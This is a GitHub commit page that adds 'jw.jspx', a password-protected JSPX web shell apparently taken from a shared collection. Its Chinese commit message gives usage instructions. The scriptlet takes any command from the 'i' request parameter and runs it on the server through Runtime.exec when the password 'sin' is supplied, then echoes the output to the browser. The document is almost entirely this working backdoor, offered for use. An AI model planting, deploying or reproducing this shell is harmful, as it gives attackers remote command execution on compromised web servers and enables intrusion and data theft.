Skip to content

Commit 1b499ce

Browse files
tennctennc
committed
Create jw.jspx
from wooyun.org 使用说明:http://xx.xx.xx/jw.jspx?pwd=sin&i=ls 有回显,带密码
1 parent 6c708c5 commit 1b499ce

File tree

1 file changed

+15
-0
lines changed

1 file changed

+15
-0
lines changed

jspx/jw.jspx

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
2+
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
3+
<jsp:scriptlet>
4+
if("sin".equals(request.getParameter("pwd"))){
5+
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
6+
int a = -1;
7+
byte[] b = new byte[2048];
8+
out.print("&lt;pre&gt;");
9+
while((a=in.read(b))!=-1){
10+
out.println(new String(b));
11+
}
12+
out.print("&lt;/pre&gt;");
13+
}
14+
</jsp:scriptlet>
15+
</jsp:root>

0 commit comments

Comments
 (0)